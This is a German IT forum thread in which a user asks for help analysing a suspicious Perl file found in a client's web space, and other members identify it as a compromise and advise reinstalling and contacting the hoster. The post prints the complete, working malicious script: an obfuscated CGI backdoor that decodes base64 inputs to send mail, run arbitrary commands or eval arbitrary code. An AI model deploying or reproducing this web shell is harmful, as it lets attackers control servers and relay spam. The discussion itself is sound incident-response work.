Top-Themen

Aktuelle Themen (A bis Z)

Administrator.de FeedbackApache ServerAppleAssemblerAudioAusbildungAuslandBackupBasicBatch & ShellBenchmarksBibliotheken & ToolkitsBlogsCloud-DiensteClusterCMSCPU, RAM, MainboardsCSSC und C++DatenbankenDatenschutzDebianDigitiales FernsehenDNSDrucker und ScannerDSL, VDSLE-BooksE-BusinessE-MailEntwicklungErkennung und -AbwehrExchange ServerFestplatten, SSD, RaidFirewallFlatratesGoogle AndroidGrafikGrafikkarten & MonitoreGroupwareHardwareHosting & HousingHTMLHumor (lol)Hyper-VIconsIDE & EditorenInformationsdiensteInstallationInstant MessagingInternetInternet DomäneniOSISDN & AnaloganschlüsseiTunesJavaJavaScriptKiXtartKVMLAN, WAN, WirelessLinuxLinux DesktopLinux NetzwerkLinux ToolsLinux UserverwaltungLizenzierungMac OS XMicrosoftMicrosoft OfficeMikroTik RouterOSMonitoringMultimediaMultimedia & ZubehörNetzwerkeNetzwerkgrundlagenNetzwerkmanagementNetzwerkprotokolleNotebook & ZubehörNovell NetwareOff TopicOpenOffice, LibreOfficeOutlook & MailPapierkorbPascal und DelphiPeripheriegerätePerlPHPPythonRechtliche FragenRedHat, CentOS, FedoraRouter & RoutingSambaSAN, NAS, DASSchriftartenSchulung & TrainingSEOServerServer-HardwareSicherheitSicherheits-ToolsSicherheitsgrundlagenSolarisSonstige SystemeSoziale NetzwerkeSpeicherkartenStudentenjobs & PraktikumSuche ProjektpartnerSuseSwitche und HubsTipps & TricksTK-Netze & GeräteUbuntuUMTS, EDGE & GPRSUtilitiesVB for ApplicationsVerschlüsselung & ZertifikateVideo & StreamingViren und TrojanerVirtualisierungVisual StudioVmwareVoice over IPWebbrowserWebentwicklungWeiterbildungWindows 7Windows 8Windows 10Windows InstallationWindows MobileWindows NetzwerkWindows ServerWindows SystemdateienWindows ToolsWindows UpdateWindows UserverwaltungWindows VistaWindows XPXenserverXMLZusammenarbeit

gelöst Analyse von Schadcode auf Webspace

Mitglied: mercuric

mercuric (Level 1) - Jetzt verbinden

16.07.2014, aktualisiert 22:09 Uhr, 1400 Aufrufe, 6 Kommentare

Moin,
ich habe gerade die Anfrage bekommen mir einen Webspace anzusehen, dessen Betreiber ein Abuse-Warning vom Provider bekommen hat.
Ich habe im Webverzeichnis unter /www/cgi-bin/ die Datei debris.pl mit folgenden Inhalt gefunden
(hab es leider nicht vernünftig formatiert bekommen)

01.
#!/usr/bin/perl -w 
02.
use strict;sub b ($) {local($^W)=0;use integer;my $s=shift;$s=~tr|A-Za-z0-9+=/||cd;return "" if length($s) % 4;$s=~s/=+$//;$s=~tr|A-Za-z0-9+/| -_|;return "" if !length $s;my $u="";my($i,$l);$l=length($s)-60;for($i=0;$i<=$l;$i+=60){$u.="M".substr($s,$i,60);}$s=substr($s,$i);if($s ne ""){$u.=chr(32+length($s)*3/4).$s;}return unpack("u",$u);}sub m {my $r=30128+256;my $q={};my $s="";if($ENV{REQUEST_METHOD} eq "GET"){$s=$ENV{QUERY_STRING};}else{my $l=$ENV{CONTENT_LENGTH};exit unless $l;while($l > length $s){my $v=length $s;sysread(STDIN,$s,($l-$v),$v);}}foreach(split(/&/,$s)){my($k,$v)=split(/=/,$_,2);next if !defined $k || !length $k;$v="" if !defined $v;$v=~tr/+/ /;$v=~s/%([0-9A-Fa-f]{2})/chr(hex($1))/esg;$q->{$k}=$v;}print "Content-type: text/html; charset=iso-8859-1\x0D\x0A\x0D\x0A";if($q->{m}==0){print $r;exit;}if($q->{m}==1){if(open(M,"| /usr/sbin/sendmail -t > /dev/null")){print M sprintf("To: %s\x0D\x0ASubject: %s\x0D\x0A%s",&b($q->{a}),&b($q->{b}),&b($q->{c}));close M;print $r;}exit;}if($q->{m}==2){use IPC::Open2 qw(open2);local $SIG{PIPE}=sub {exit};my($o,$i);my $p=open2 $o,$i,&b($q->{a});print $i &b($q->{b});close $i;print while(<$o>);close $o;waitpid($p,0);exit;}if($q->{m}==3){eval(&b($q->{a}));exit;}}&m();
Hab jetzt noch nicht so viele Perl Skripte gesehen, aber es sieht für mich aus, als würden damit (Spam)-Mails verschickt.
Liege ich da mit richtig? Kann mir noch jemand mehr dazu sagen?
In den Logfiles ist zu sehen, dass auf die Datei regelmäßig von IP-Adressen aus verschieden Ländern zugegriffen wurde.
Würdet Ihr sagen, dass es reicht das Skript zu entfernen (und natürlich alles Login Daten zu ändern) oder gibt es in dem Code Hinweise, dass es noch mehr korrupte Files gibt?

Vielen Dank für eure Mühe
mercuric
Mitglied: colinardo
LÖSUNG 16.07.2014, aktualisiert um 22:09 Uhr
Hallo mercuric,
da haben die sich ein Rootkit eingefangen. Hatte vor ein paar Tagen ein ähnliches System das komplett kompromittiert war (OpenSSH Sicherheitslücke). Bei diesem System wurden diverse Veränderungen vorgenommen um den Server auch nach einem Reboot immer wieder zu infizieren.

Neuinstallation ist in diesem Fall unbedingt anzuraten !

Hier noch ein Link dazu:
http://security.stackexchange.com/questions/10202/perl-script-rootkit-e ...

Wenn es ein Managed Server ist, ist vermutlich nur die Seite bzw. das CMS infiziert. Hier sind dann sämtliche Seiten auf Veränderungen zu überprüfen, oder auch dieses neu einzuspielen.

Grüße Uwe
Bitte warten ..
Mitglied: mercuric
16.07.2014 um 21:48 Uhr
Vielen Dank für deine schnelle Antwort, dass ja schon mal sehr spannend.
Es handelt sich lediglich um Webspace, sprich FTP, MySQL und Mail Zugang nicht um einen Root-Server (1blu-Homepage Professional).
Auf dem Space liegen nur reine HTML-Files, die auf dem ersten Blick sauber aussehen und Images/PDFs.
Ist es auch möglich so einem abgeschotteten System weiter zu kompromittieren?
Bitte warten ..
Mitglied: colinardo
16.07.2014, aktualisiert um 22:12 Uhr
Wenn nicht alle Sicherheitspatches eingespielt wurden oder eine Erweiterung des Hosters Sicherheitslücken aufweist, kann das schon mal sein, zwar selten, aber nicht unmöglich. Checke trotzdem alle Seiten auch auf komprimiertes JavaScript.
https://www.administrator.de/forum/opera-browser-warnung-vor-einer-b&oum ...
Bitte warten ..
Mitglied: certifiedit.net
16.07.2014 um 22:11 Uhr
..und kontaktiere den Hoster.
Bitte warten ..
Mitglied: LordGurke
17.07.2014 um 21:06 Uhr
Eine aktuelle OpenSSH-Lücke? Finde da gerade nichts halbwegs aktuelles...
Hast du da Details für mich?
Bitte warten ..
Mitglied: colinardo
17.07.2014, aktualisiert um 21:09 Uhr
Zitat von LordGurke:

Eine aktuelle OpenSSH-Lücke? Finde da gerade nichts halbwegs aktuelles...
Hast du da Details für mich?
hab nicht gesagt das die aktuell war der Betreiber hat das betroffene System ziemlich vernachlässigt...
Bitte warten ..
Ähnliche Inhalte
Sicherheit

Sicherheitsupdate: Thunderbird als Einfallstor für Schadcode

Information von Penny.CilinSicherheit

Hallo zusammen, wer Mozillas Thunderbird benutzt, sollte dringend aktualisieren: Sicherheitsupdate: Thunderbird als Einfallstor für Schadcode Siehe dazu auch Gruss ...

Webentwicklung

Webspace Ranking

Frage von malikaWebentwicklung5 Kommentare

Guten Tag, ich habe heute mit einem Webentwickler gesprochen und er meinte, wenn eine Website in Russland besseren Ranking ...

LAN, WAN, Wireless

Netzwerk Analyse

gelöst Frage von TooobiiLAN, WAN, Wireless9 Kommentare

Hallo, ich interessiere mich sehr über WLAN und allgemein über Netzwerke, kenne mich allerdings nur in ein paar wenigen ...

Windows Server

Traffic-Analyse

gelöst Frage von malikaWindows Server15 Kommentare

Hallo, über den Router sehe ich, dass manchmal die Netzwerkbelastung zu hoch ist. Ich sehe auch von welchen Rechner. ...

Neue Wissensbeiträge
CMS
Erneut kritische Zero-Day-Lücke in Drupal
Tipp von Reini82 vor 4 StundenCMS

Laut einem Bericht auf t3n gibt es eine Schwere Sicherheitslücke in Drupal die auch schon ausgenutzt wird. Betroffen sind ...

Sicherheit

MikroTik-Router patchen, Schwachstelle wird ausgenutzt

Information von kgborn vor 1 TagSicherheit

Am 23. April 2018 wurde von Mikrotik ein Security Advisory herausgegeben, welches auf eine Schwachstelle im RouterOS hinwies. Mikrotik ...

Windows 10

Microcode-Updates KB4090007, KB4091663, KB4091664, KB4091666 für Windows 10

Information von kgborn vor 1 TagWindows 101 Kommentar

Kurze Information für Administratoren von Windows 10-Systemen, die mit neueren Intel CPUs laufen. Microsoft hat zum 23. April 2018 ...

iOS
Updates für Iphone und Co
Information von sabines vor 1 TagiOS

Gestern abend ist iOS 11.3.1 erschienen, ein kleineres Update, dass einige Lücken schließt und "Lahmlegen" nach einem Display Tausch ...

Heiß diskutierte Inhalte
Windows Server
Alten DC entfernen
gelöst Frage von smartinoWindows Server27 Kommentare

Hallo zusammen, ich habe hier eine Umgebung übernommen und erstmal einen DCDIAG gemacht. Dabei fällt auf, daß eine ganze ...

Ausbildung
Wie gelingt ein guter Einstieg in die FiSi-Ausbildung? (Umschulung)
Frage von SiAnKoAusbildung26 Kommentare

Schönen guten Tag, ich bin SiAnKo und habe seit dem 1.04.2018 eine Umschulung als FiSi angefangen. Ich möchte natürlich ...

Batch & Shell
Mit Powershell den Inhalt einer Excel mit einer Text Datei abgleichen
gelöst Frage von Bommi1961Batch & Shell21 Kommentare

Hallo zusammen, ich muss den Inhalt einer Excel Datei (Mappe1) mit dem Daten einer Text Datei abgleichen. Die Daten ...

Windows 10
Unter Windows 10 Home 64Bit (1709) kommt Fehler beim Aufruf von verschiedenen Systemprogrammen wie z.B. Gerätemanager
Frage von bitshopWindows 1017 Kommentare

Hallo, beim meinem Onkel haben wir seit längerem das Problem, dass z.B. beim Aufruf des Gerätemanagers eine Fehlermeldung kommt ...